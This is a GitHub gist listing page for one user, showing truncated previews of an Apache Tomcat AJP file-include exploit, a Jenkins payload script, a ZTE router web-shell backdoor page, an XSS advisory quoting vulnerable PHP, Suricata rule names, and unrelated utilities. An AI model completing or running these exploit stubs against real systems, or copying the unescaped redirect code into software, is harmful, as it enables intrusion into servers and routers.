xax007 /
Created Feb 23, 2020
Apache Tomcat AJP local file include and code execution exploit
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# [url][/url]
def pack_string(s):
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
xax007 /
Last active Nov 20, 2019


Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
xax007 / Suricata_Rules_Descriptionaa
Created Jun 3, 2019
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
xax007 /
Created May 5, 2019 — forked from josephg/
Apple dictionaries
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mojave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/'
f = open(filename, 'rb')
View newol.dat
xax007 /
Created Apr 11, 2019 — forked from asukakenji/
Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, i.e. without the help of a C compiler, etc.)

  • android
  • darwin
xax007 /
Created Mar 16, 2019 — forked from Tom4t0/
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

By default, Microsoft Active Directory servers offer LDAP over unencrypted connections (boo!).

The steps below create a new self-signed certificate suitable for an AD server and use it to enable LDAPS. Of course, the "self-signed" portion of this guide can be swapped out for a real vendor-purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
class Dummy{ }
xax007 / web_shell_cmd.gch
Created Nov 30, 2018
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""">
<html xmlns="">
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
F460 Webshell